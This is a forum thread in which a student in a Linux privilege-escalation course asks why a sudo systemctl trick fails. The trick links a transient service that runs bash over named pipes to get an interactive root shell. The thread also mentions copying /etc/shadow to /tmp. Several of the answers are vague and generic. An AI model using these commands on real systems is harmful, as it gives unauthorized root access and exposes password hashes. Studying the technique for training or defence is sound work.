Hey everyone! I'm diving into a Linux privilege escalation course and stumbled across some interesting stuff about systemctl abuse. I'm curious about why I can't get an interactive shell using named pipes with systemctl, while it seems to work fine without it. Here's what I've tried:
f1=/tmp/infifo
f2=/tmp/outfifo
mkfifo $f1 $f2
sf=`mktemp`.service
echo -e "[Service]nExecStart=eval "/bin/bash $f2 &"n[Install]nWantedBy=multi-user.target" > $sf
sudo systemctl link $sf
sudo systemctl enable $sf --now
cat $f2 &
cat > $f1
The command didn't work for me, but when I run bash with the pipes without using systemctl, it works perfectly. Am I messing up the pipes logic somewhere? Any insights on how to properly use named pipes would be greatly appreciated!
3 Answers
It sounds like you're on the right track with trying to leverage systemctl for this kind of interaction, but remember that it may require specific privileges. Systemd commands and their path requirements can get a bit convoluted, so it’s worth double-checking that!
The problem is likely due to the way systemd handles execution. When you specify commands in ExecStart, it expects a complete executable path, and `eval` is a shell command, not an executable. You might want to create a script that wraps your bash command and call that instead!
It looks like you might want to check out the details on the systemctl page you linked. When using sudo with systemctl, the command usually needs to be run by a user with elevated privileges right from the start. It’s important to note that some commands require you to have those privileges initially, or they won't execute as you expect. You could always try running it under a user with proper permissions to see if that changes anything!
Good point! But if you're facing restrictions with named pipes, it's worth checking how your user permissions are set up. It's a bit tricky when trying to mix user restrictions and named pipes.
I get that, but I've seen similar commands work with a simple eval like `cp /etc/shadow /tmp/shadow`. My issue is that with named pipes, it seems like nothing's happening when I input commands. What could be the issue with the pipes in this scenario?